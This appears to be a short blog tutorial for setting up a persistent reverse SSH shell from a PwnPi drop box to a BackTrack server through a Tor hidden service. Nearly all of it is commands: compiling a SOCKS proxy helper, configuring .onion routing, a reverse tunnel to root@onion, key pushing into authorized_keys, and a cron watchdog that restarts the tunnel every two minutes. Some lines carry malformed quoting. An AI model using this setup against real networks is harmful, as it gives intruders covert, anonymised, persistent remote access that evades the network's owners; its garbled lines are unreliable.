tor reverse shell

Client Side

PwnPi v3.0 comes with Tor preinstalled. Just type apt-get update && apt-get upgrade to get the latest version.

Download & compile connect.c. It’s used as proxy for Openssh.

wget https://savannah.gnu.org/maintenance/connect.c
gcc -o /usr/local/bin/connect connect.c
chmod 755 /usr/local/bin/connect
chown root.root /usr/local/bin/connect

Configure Openssh to use proxy for .onion adress.

nano /etc/ssh/ssh-config
Add two lines at the end of file:

Host *.onion
ProxyCommand /usr/local/bin/connect -S localhost:9050 %h %p

Enable tor autostart.
update-rc.d tor enable

Server Side

In this example i’m using BackTrack5R3 as server. Its also running tor and of course openssh.

First create a tor hiddenserver for port 22 (SSH)
nano /etc/tor/torrc and add following to end of file:

HiddenServiceDir /var/lib/tor/ssh/
HiddenServicePort 22 127.0.0.1:22

When done, restart tor (/etc/init.d/tor restart). A hiddenservice should be create. Check it by running: cat /var/lib/tor/ssh/hostname. If the hostname file is missing, something went wrong.

Also do: echo „1“ > /proc/sys/net/ipv4/ip_forward 

Reverse-shell

revpwnscript

Put your onion hostname into this cmd line.

ssh -NR 3300:localhost:22 root@<youronionhostnamehere>.onion

Save this line in a file named reversepwn. It’s need for autorun on boot later on.

To automate login procedure and granting the pwnpi access to the ssh server, do this on your pwnpi:

ssh-keygen -t rsa

cat ~/.ssh/*.pub | ssh root@>youronionhostname.onion ‚umask 077; cat >>.ssh/authorized_keys‘

I made a lazy script to check if proxy is running.

#!/bin/sh
SERVICE=connect
if ps ax | grep -v grep | grep -v $0 | grep $SERVICE > /dev/null
then
echo "$SERVICE service running, everything is fine"
echo "`date`: service running" >> reverseonion.log
else
echo "$SERVICE is not running"
echo "starting service"
bash /root/reversepwn
echo "`date`: service not running - starting!" >> reverseonion.log
fi

Save it to /root/check.sh – Add cronjob via crontab -e

0,2,4,6,8,10,12,14,16,18,20,22,24,26,28,30,32,34,36,38,40,42,44,46,48,50,52,54,56,58 * * * * bash /root/check.sh

If everything worked fine, it should look something like this:

backtrack con est

<eof> vers. 0,1

related links:
http://www.irongeek.com/i.php?page=security/raspberry-pi-recipes
http://www.schlittermann.de/doc/ssh
http://www.securitygeneration.com/security/reverse-ssh-over-tor-on-the-pwnie-express/
http://nesit.org/minipwner-reverse-ssh-over-tor/